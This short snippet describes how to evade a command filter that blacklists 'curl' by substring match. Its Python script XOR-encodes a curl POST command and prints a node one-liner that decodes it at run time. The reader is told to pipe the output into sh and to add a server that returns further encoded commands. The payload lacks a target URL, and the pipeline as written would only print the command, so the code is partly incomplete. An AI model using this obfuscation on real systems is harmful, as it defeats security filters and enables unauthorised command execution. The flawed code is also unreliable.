Bypass for a command filter that uses `command.includes('curl')` to blacklist curl: such a substring check can be evaded by piping the output of this script into sh.
```python
from random import choices

# Double-quoted delimiters let the payload itself end with the single quote
# that closes the -d argument.
payload = b"""curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}'"""
# One random byte per payload byte; XORing with it hides the literal "curl".
obfuscation_key = choices(range(256), k=len(payload))
obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)]
# Emit a node one-liner that reverses the XOR and prints the original command.
# Could be obfuscated further by adding random spacing, etc.
print(f"node -e 'console.log(String.fromCharCode(...{obfuscated_payload}.map((x,i)=>x^{obfuscation_key}[i])))'")
```